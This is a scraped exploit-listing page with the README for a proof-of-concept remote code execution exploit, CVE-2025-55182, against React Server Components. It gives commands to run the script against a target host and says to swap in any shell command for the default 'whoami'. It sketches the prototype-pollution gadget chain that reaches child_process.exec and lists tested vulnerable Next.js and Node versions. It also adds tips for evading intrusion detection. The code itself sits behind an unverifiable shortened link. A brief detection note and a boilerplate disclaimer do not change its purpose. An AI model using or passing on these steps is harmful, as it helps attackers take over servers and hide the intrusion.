## https://sploitus.com/exploit?id=D6AD660D-E190-502C-9BCA-DB5117EEA260
# CVE-2025-55182
Proof-of-concept exploit for CVE-2025-55182, a critical pre-authentication remote code execution vulnerability in React Server Components. The exploit targets unsafe deserialization in Server Function endpoints across affected packages like react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack in versions 19.0.0 through 19.2.0.
## Usage
- Install deps: `pip install -r requirements.txt`
- Customize the payload in `payload_template.json`. The default uses a gadget chain leveraging `child_process.exec` via prototype pollution in the deserialization handler. Replace `"command": "whoami"` with your desired shell command.
- Execute: `python CVE-2025-55182.py -t target.com -payload payload_template.json`
## Technical Details
The vulnerability stems from improper sanitization in the RSC deserialization pipeline. Specifically, when handling async Server Functions, the endpoint accepts untrusted input via `application/json` or `multipart/form-data` bodies. By polluting the prototype chain in the deserialized object (e.g., via `__proto__` or constructor overrides), an attacker can hook into internal Node.js modules like `child_process`.
This bypasses default input checks in react-server-dom-* packages, leading to RCE.
Tested against:
- Next.js 15.0.0-15.0.4 with RSC enabled.
- Custom Vercel-like deployments without platform mitigations.
- Local Node.js 20.x with vulnerable react-server-dom-webpack@19.2.0.
## Limitations and Detection
- Not all RSC setups are vulnerable; Vercel-hosted instances have built-in protections per the advisory.
- Detection: Look for anomalous POSTs to /api/* with base64 blobs >1KB. IDS rules can flag prototype pollution patterns in JSON.
- Evasion: Use chunked encoding or multipart to split payloads.
## Disclaimer
Use this responsibly, only on systems you own or have permission to test. I'm not liable for any misuse. This is for educational and research purposes.
## Exploit
[href](https://tinyurl.com/mryu9wzt)
For inquiries, reach out via X: @B1gh0rnn